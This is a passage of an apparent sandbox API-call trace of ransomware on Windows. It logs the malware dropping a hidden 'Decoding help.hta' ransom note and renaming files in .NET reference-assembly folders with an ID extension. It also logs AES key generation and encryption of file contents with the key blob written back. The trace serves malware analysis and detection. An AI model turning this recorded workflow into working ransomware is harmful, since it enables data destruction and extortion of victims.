(lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.101] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.101] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WindowsFormsIntegration.dll") returned -1 [0058.101] lstrlenW (lpString="WindowsFormsIntegration.dll") returned 27 [0058.101] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.101] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.101] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.101] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="WindowsFormsIntegration.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" [0058.102] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" [0058.102] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.102] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812df993, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c36dac1, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c36dac1, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinFXList.xml", cAlternateFileName="WINFXL~1.XML")) returned 1 [0058.102] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.102] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.102] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.102] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.102] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WinFXList.xml") returned -1 [0058.102] lstrlenW (lpString="WinFXList.xml") returned 13 [0058.102] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.102] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.102] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="WinFXList.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" [0058.102] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" [0058.102] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0058.103] CreateFileMappingA (hFile=0x718, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x628 [0058.103] CryptAcquireContextA (in: phProv=0x1781fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1781fcec*=0x34491c0) returned 1 [0060.176] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x1781fce8 | out: phKey=0x1781fce8*=0x5d8ad0) returned 1 [0060.176] CryptExportKey (in: hKey=0x5d8ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1781fbe4, pdwDataLen=0x1781fce4 | out: pbData=0x1781fbe4*, pdwDataLen=0x1781fce4*=0x2c) returned 1 [0060.176] MapViewOfFile (hFileMappingObject=0x628, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa00) returned 0x3930000 [0061.897] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1781fbe4*, pdwDataLen=0x1781fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1781fbe4*, pdwDataLen=0x1781fcf8*=0x100) returned 1 [0061.900] CryptEncrypt (in: hKey=0x5d8ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3930000*, pdwDataLen=0x1781fce4*=0xa00, dwBufLen=0xa00 | out: pbData=0x3930000*, pdwDataLen=0x1781fce4*=0xa00) returned 1 [0061.902] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0061.904] CloseHandle (hObject=0x628) returned 1 [0061.904] CryptDestroyKey (hKey=0x5d8ad0) returned 1 [0061.904] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0061.904] SetFilePointerEx (in: hFile=0x718, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.904] WriteFile (in: hFile=0x718, lpBuffer=0x1781fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1781fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1781fbe4*, lpNumberOfBytesWritten=0x1781fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.905] WriteFile (in: hFile=0x718, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1781fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1781fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.905] CloseHandle (hObject=0x718) returned 1 [0061.905] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.905] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812df993, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c36dac1, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c36dac1, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinFXList.xml", cAlternateFileName="WINFXL~1.XML")) returned 0 [0061.905] FindClose (in: hFindFile=0x5d7fd0 | out: hFindFile=0x5d7fd0) returned 1 Thread: id = 575 os_tid = 0xd40 [0048.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*", lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a23a69d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a23a69d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bf0 [0051.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.588] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a23a69d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a23a69d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.281] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0052.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.281] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x565d698d, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x565d698d, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x754f141c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Conversion.v3.5.dll", cAlternateFileName="")) returned 1 [0052.281] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0052.281] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0052.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0052.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0xffffffff [0052.281] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c0 [0053.664] WriteFile (in: hFile=0x6c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xaf0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xaf0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.460] CloseHandle (hObject=0x6c0) returned 1 [0057.579] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.579] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Conversion.v3.5.dll") returned -1 [0057.579] lstrlenW (lpString="Microsoft.Build.Conversion.v3.5.dll") returned 35 [0057.579] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.579] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.579] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Conversion.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" [0057.579] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" [0057.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.580] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6605bc5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6605bc5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb662bd26, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Engine.dll", cAlternateFileName="")) returned 1 [0057.580] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.580] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.580] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.580] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Engine.dll") returned -1 [0057.580] lstrlenW (lpString="Microsoft.Build.Engine.dll") returned 26 [0057.580] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.580] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.580] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.580] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Engine.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" [0057.580] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" [0057.580] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.581] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d930d9, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x56d930d9, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x777e773c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Framework.dll", cAlternateFileName="")) returned 1 [0057.581] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.581] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.581] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.581] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Framework.dll") returned -1 [0057.581] lstrlenW (lpString="Microsoft.Build.Framework.dll") returned 29 [0057.581] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.581] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.581] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.581] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Framework.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" [0057.581] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" [0057.581] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference 